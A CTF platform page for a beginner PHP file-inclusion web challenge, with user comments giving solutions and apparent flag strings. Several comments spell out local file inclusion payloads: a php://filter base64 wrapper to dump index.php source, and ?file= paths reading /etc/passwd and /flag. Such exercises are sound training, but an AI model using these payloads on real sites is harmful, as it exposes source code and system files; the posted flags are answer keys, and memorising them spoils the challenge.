文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 13803
提  示:
描  述:
flag{}
评论
gyc3153616052 3年前

flag{d2fc833912015ef20e29905ab607e995}

回复 0

llluyan 3年前

flag:flag{2773e5133de5c764209074ecd6cf2a3a}

回复 0

canxue11 3年前

payload:?file=php://filter/read=convert.base64-encode/resource=index.php base64解码可得flag

回复 1

HuangYanQwQ 3年前

打开环境看到有一个超链接click me? no,点进去变成了index.php,并且URL末尾多了一句index.php?file=show.php,看到*.php?file就能猜到是伪协议读取文件了,把URL改成index.php?file=/etc/passwd,爆出来的数据也能验证,而且没过滤,直接index.php?file=/flag

回复 10

snickerX 3年前

php://filter伪协议

回复 1

LHJ2022 3年前

http://114.67.175.224:xxxxx/index.php?file=/flag 这不直接出flag

回复 14

是啊志啊 4年前

在url后改为 ?file=php://filter/read=convert.base64-encode/resource=index.php发现显示了base64编码的字符串 复制解码就行了

回复 2

发到付件埃里克FDA 4年前

这题考的就是 本地文件包含漏洞获得 php代码的内容

回复 0

wuzhengke 4年前

先点击场景中超链接,进入新界面。新界面url(网址)改为http://114.67.175.224:10430/index.php?file=php://filter/read=convert.base64-encode/resource=index.php,进入新界面,上面的密文base64解密,解密的内容中含有flag

回复 1

lysandria 4年前

php://,data://,filter等伪协议被重置,直接?file=./flag.php知道路径,然后用?file=file:///./flag.php

回复 0

WriteUp

image
harry

2 金币

评分(11)

解题动态

亚洲 攻破了该题 4小时前
TohsakaRin 攻破了该题 14小时前
anbd 攻破了该题 1天前
李政 攻破了该题 1天前
WWls= 攻破了该题 2天前
michelle123 攻破了该题 2天前
hotwind 攻破了该题 2天前
小爱莉希雅 攻破了该题 3天前
kimol 攻破了该题 3天前
nonlvyx 攻破了该题 3天前
fl4y 攻破了该题 3天前
青春小豆 攻破了该题 5天前
cheat 攻破了该题 5天前
AWDAI 攻破了该题 5天前
Terrenc44 攻破了该题 5天前
耶无忧 攻破了该题 5天前
jvfnvd.vl 攻破了该题 5天前
niubill 攻破了该题 5天前
Star666 攻破了该题 6天前
whshkdh 攻破了该题 6天前
问题反馈